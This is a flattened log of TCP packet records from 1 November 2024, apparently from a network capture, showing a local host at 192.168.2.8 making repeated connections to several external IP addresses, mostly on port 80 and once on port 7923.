                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.557456970 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562385082 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562448978 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562653065 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562680006 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.566246986 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.567440987 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.567498922 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571052074 CET804971418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571122885 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571266890 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571294069 CET4971480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.576128960 CET804971418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.576145887 CET804971418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.240771055 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.240838051 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.240896940 CET4971380192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.245820045 CET8049713172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.255470037 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.260349989 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.260415077 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.261008024 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.261022091 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.265850067 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.265916109 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.913611889 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.913983107 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.914072037 CET4971580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.918792009 CET8049715172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.946083069 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.950913906 CET804971718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.951155901 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.951155901 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.951333046 CET4971780192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.955967903 CET804971718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.956038952 CET804971718.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.336797953 CET4972980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.341605902 CET8049729172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.815197945 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.820180893 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.820291042 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.843611002 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.843650103 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.848529100 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.848540068 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.028588057 CET4972880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.050004959 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.054908991 CET804973282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.055898905 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.056054115 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.056054115 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.060893059 CET804973282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.060903072 CET804973282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.270754099 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.304816961 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.310446978 CET804973118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.310516119 CET4973180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.401175022 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.513763905 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.513858080 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.514158964 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.514182091 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.518970013 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.518981934 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.023384094 CET4973280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.053298950 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058312893 CET804973482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058415890 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058592081 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058623075 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.063371897 CET804973482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.063383102 CET804973482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:40.212666035 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:40.288543940 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.065002918 CET4973480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.228883028 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.233781099 CET804973582.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.233850002 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.240446091 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.240446091 CET4973580192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.245234013 CET804973582.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.245357990 CET804973582.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:45.746051073 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:45.750983000 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.001431942 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.001507044 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.002249002 CET4973380192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.008706093 CET804973382.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.016417980 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.018377066 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.025037050 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.132632017 CET4973680192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.137561083 CET804973682.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.138307095 CET4973680192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418382883 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418502092 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.418525934 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.423341990 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:53.423373938 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.078748941 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.078818083 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.078866959 CET4974480192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.084050894 CET8049744172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.293093920 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.298158884 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.299209118 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.299376965 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.299403906 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.304236889 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.304251909 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.272229910 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.272378922 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.277576923 CET804974534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.277631998 CET4974580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.310250044 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.315272093 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.315359116 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.316514015 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.316553116 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.321386099 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.321515083 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.887487888 CET804973882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.887593031 CET4973880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.887628078 CET4973880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.892508030 CET804973882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.930238962 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935184956 CET804974782.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935257912 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935396910 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.935436010 CET4974780192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.940233946 CET804974782.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.940247059 CET804974782.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.978889942 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.979032993 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.985234976 CET804974618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.985286951 CET4974680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.009844065 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.014915943 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.014990091 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.015181065 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.015197992 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.020056009 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.020107985 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.651983023 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.679869890 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.679891109 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.684770107 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.684859991 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.824629068 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.864861965 CET4974980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.869827986 CET804974913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.869880915 CET4974980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935084105 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935600996 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935746908 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935771942 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.940576077 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.940587044 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.622211933 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.651112080 CET804975413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.653321981 CET4975480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.658446074 CET804975413.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.658754110 CET4975480192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.669987917 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.670022011 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.674736023 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.674758911 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.764630079 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769486904 CET804975744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769562006 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769706011 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769706011 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.774537086 CET804975744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.774548054 CET804975744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.840455055 CET8049756165.160.13.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.884303093 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889101028 CET804975854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889163971 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889302969 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889317989 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.892802000 CET4975680192.168.2.8165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.894071102 CET804975854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.894083023 CET804975854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.033519030 CET4975880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.058646917 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063545942 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063620090 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063754082 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063786983 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.068546057 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.068561077 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.205446005 CET4975780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.231360912 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.236231089 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.236309052 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.239578962 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.239610910 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.244582891 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.244678020 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.898284912 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.898834944 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.898977995 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.899441004 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.904290915 CET804975954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.905150890 CET804976044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.905220985 CET4975980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.905227900 CET4976080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.945480108 CET4974880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.945713997 CET4976180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.950761080 CET8049748208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.073673964 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.073745966 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.073998928 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.074021101 CET4976880192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.079001904 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.079022884 CET804976818.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.346950054 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352149010 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352227926 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352500916 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352538109 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.357311010 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.357692003 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.313596010 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.315691948 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.320846081 CET804976934.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.320899963 CET4976980192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.475723028 CET4977080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481122017 CET804977018.208.156.248192.168.2.8
